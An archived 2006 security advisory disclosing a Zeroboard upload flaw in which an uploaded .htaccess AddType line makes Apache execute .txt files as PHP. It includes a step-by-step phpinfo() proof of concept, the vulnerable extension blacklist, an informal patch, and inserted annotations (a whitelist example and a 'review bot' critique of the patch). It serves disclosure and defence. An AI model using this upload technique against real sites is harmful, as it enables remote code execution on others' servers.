lists.openwall.net
Open Source and information security mailing list archives
Date: Fri Jun 16 09:13:47 2006
From: mins at wins21.com (Choi Min-sung)
Subject: Zeroboard File Upload & extension bypass Vulnerability

Zeroboard File Upload & extension bypass Vulnerability 

Author : Choi Min-sung (mins __at__ wins21.com)
Product : Zeroboard  http://www.nzeo.com
Vendor-Patches : Unpatched
Impact : remote code execution



Summary
=======

Zeroboard prohibits the upload of PHP, HTML and CGI files, but the upload of
other files that can modify the Apache configuration, such as .htaccess, is
not treated as a serious issue. A remote attacker can therefore execute
arbitrary code on the system and also take control of it.


Affected Products
=================

* Apache installations whose httpd.conf grants AllowOverride FileInfo or
AllowOverride All, so that an .htaccess file in the upload directory can
change the file type (handler) used to serve uploaded files.
* Zeroboard 4.1pl8 or earlier


Details
=======

Zeroboard prohibits uploading executable scripts such as .php, .html, .cgi
and .asp files.

write_ok.php
------------
// Upload prohibited
if($file1_size>0) {
    $s_file_name1=$file1_name;
    if(eregi("\.inc",$s_file_name1)||eregi("\.phtm",$s_file_name1)||eregi("\.htm",$s_file_name1)||eregi("\.shtm",$s_file_name1)
       ||eregi("\.ztx",$s_file_name1)||eregi("\.php",$s_file_name1)||eregi("\.dot",$s_file_name1)||eregi("\.asp",$s_file_name1)
       ||eregi("\.cgi",$s_file_name1)||eregi("\.pl",$s_file_name1))
        Error("The HTML and PHP related files cannot be uploaded.");


The above code, however, does not block the upload of files such as
.htaccess.
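
The following PHP is an added example, not Zeroboard's code or the advisory author's patch; it contrasts the behaviour of the original substring blacklist with a whitelist check that rejects dotfiles and multi-extension names. The permitted extension list, the function names and the sample file names are assumptions.

```php
<?php
// Added example (not Zeroboard's code): replace the extension blacklist in
// write_ok.php with a whitelist of permitted attachment extensions.
// The allowed list below is an illustrative assumption.
const ALLOWED_UPLOAD_EXT = ['jpg', 'jpeg', 'gif', 'png', 'zip', 'txt'];

// Behaviour of the original blacklist: a case-insensitive substring match
// anywhere in the name (eregi() no longer exists in PHP 7, so preg_match
// emulates it). ".htaccess" matches none of the listed extensions.
function zeroboard_blacklist_rejects(string $name): bool
{
    return preg_match('/\.(inc|phtm|htm|shtm|ztx|php|dot|asp|cgi|pl)/i', $name) === 1;
}

// Hardened check: accept only "<basename>.<ext>" where ext is whitelisted,
// the basename is non-empty and made of safe characters, and the name has
// no second dot, path separator or control character. Dotfiles such as
// .htaccess fail because their basename would be empty; "x.php.jpg" fails
// because of the second dot.
function upload_name_allowed(string $name): bool
{
    if (!preg_match('/^[A-Za-z0-9_-]+\.([A-Za-z0-9]+)$/', $name, $m)) {
        return false;
    }
    return in_array(strtolower($m[1]), ALLOWED_UPLOAD_EXT, true);
}

// Constructed sample names, including the advisory's .htaccess and test.txt.
$samples = ['photo.jpg', 'test.txt', '.htaccess', 'shell.php', 'shell.php.jpg', 'a.b.txt'];
foreach ($samples as $n) {
    printf("%-15s blacklist rejects: %-4s whitelist allows: %s\n",
        $n,
        zeroboard_blacklist_rejects($n) ? 'yes' : 'no',
        upload_name_allowed($n) ? 'yes' : 'no');
}
```

Even with a whitelist, the upload directory should be served with AllowOverride None and without a PHP handler, so that a configuration file that slips through cannot change how stored files are served.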


The Process of an Actual Attack 
=============================== 
- Attack Scenario 

1. A malicious user uploads the following '.htaccess' file.

.htaccess 
--------- 
AddType application/x-httpd-php .php .php3 .php4 .htm .html .txt 

2. A malicious user uploads the following .txt file.
test.txt 
-------- 
<? phpinfo(); ?>

3. The PHP code is executed, because the uploaded .htaccess now makes Apache
treat the .txt file as a PHP script.

$ lynx --dump http://hackme/zb41pl7/bbs/data/test/test.txt 


Solution
========

Below is an informal patch that I made. 
Vendor status -> Unpatched

write_ok.php.patch 
------------------ 
--- write_ok.php.org 2005-09-01 19:22:17.000000000 +0900 
+++ write_ok.php 2005-09-01 19:22:27.000000000 +0900 
@@ -208,7 +208,7 @@ 

// Upload prohibited 
if($file1_size>0) { 
$s_file_name1=$file1_name; 
-
if(eregi("\.inc",$s_file_name1)||eregi("\.phtm",$s_file_name1)||eregi("\.htm
",$s_file_name1)||eregi("\.shtm",$s_file_name1)

||eregi("\.ztx",$s_file_name1)||eregi("\.php",$s_file_name1)||eregi("\.dot",
$s_file_name1)||eregi("\.asp",$s_file_name1)

||eregi("\.cgi",$s_file_name1)||eregi("\.pl",$s_file_name1)) Error("The HTML
and PHP related files cannot be uploaded."); 

+
if(preg_match("/^\./",$s_file_name1)||eregi("\.inc",$s_file_name1)||eregi("\
.phtm",$s_file_name1)||eregi

("\.htm",$s_file_name1)||eregi("\.shtm",$s_file_name1)||eregi("\.ztx",$s_fil
e_name1)||eregi("\.php",$s_file_name1)||eregi

("\.dot",$s_file_name1)||eregi("\.asp",$s_file_name1)||eregi("\.cgi",$s_file
_name1)||eregi("\.pl",$s_file_name1)) Error("The 

HTML and PHP related files cannot be uploaded."); 

//Check extension 
if($setup[pds_ext1]) { 
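
Review bot: the new `preg_match("/^\./",$s_file_name1)` test on the `+` line rejects only names whose first character is a dot, so it stops `.htaccess` but leaves the surrounding check a blacklist: any extension not listed (`.txt`, as in step 2 of the scenario) is still accepted, and whether such a file is ever executed depends on the server's AllowOverride/AddType configuration rather than on this code. An additional, configurable extension check (`//Check extension`, `if($setup[pds_ext1])`) follows the hunk; if that check is a whitelist of permitted extensions, making it mandatory rather than conditional on `$setup` would remove the dependence on the blacklist, and serving the data directory with `AllowOverride None` would stop an upload from changing its own handler. Separately, the `-` and `+` markers sit on their own lines and the long `if(...)` lines are broken across several physical lines, so the patch as posted will not apply with `patch(1)`; it needs to be re-sent with markers and lines intact.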


Timeline
========
01/09/2005 Initial vendor notification. I made a temporary patch.
02/09/2005 Vendor confirms vulnerability.
15/03/2006 Vendor released patch 4.1pl8 (this vulnerability NOT fixed).
12/06/2006 Vulnerability reported to KISA (Korea Information Security Agency) KRCert.
12/06/2006 Final Vendor Contact.
12/06/2006 Secunia notified of this vulnerability.
16/06/2006 Public disclosure.
 
Credits  
=======
Discovered by Choi Min-sung, WINSTechnet CERT
 

Reference Site  
==============
http://securecast.wins21.com/zerovul.html
http://securecast.wins21.com/offer/offer_database_view.asp?code=WE06-0391

